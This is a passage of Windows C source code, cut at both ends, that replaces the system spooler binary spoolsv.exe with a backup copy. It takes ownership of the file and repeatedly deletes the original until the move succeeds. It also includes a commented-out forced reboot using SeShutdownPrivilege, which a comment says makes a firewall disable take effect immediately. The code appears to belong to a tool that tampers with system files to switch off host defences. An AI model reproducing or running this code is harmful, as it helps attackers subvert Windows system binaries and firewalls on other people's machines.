SetNamedSecurityInfoA("System32\\spoolsv.bak.exe",SE_FILE_OBJECT,OWNER_SECURITY_INFORMATION,ownersid,NULL,NULL,NULL);
//copy file back
while(MoveFileA("System32\\spoolsv.bak.exe","System32\\spoolsv.exe") == 0){
DeleteFileA("System32\\spoolsv.exe");
Sleep(100);
}
//This can be added so fw disable takes effect immediately and this process exits
/*/reboot
HANDLE tokenh;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&tokenh);
TOKEN_PRIVILEGES tkp, otkp;
DWORD oldsize;
tkp.PrivilegeCount = 1;
LookupPrivilegeValueA(NULL,"SeShutdownPrivilege",&(tkp.Privileges[0].Luid));
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(tokenh,FALSE,&tkp,sizeof(tkp),&otkp,&oldsize);
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_OPERATINGSYSTEM |
SHTDN_REASON_MINOR_UPGRADE | SHTDN_REASON_FLAG_PLANNED);//*/
}
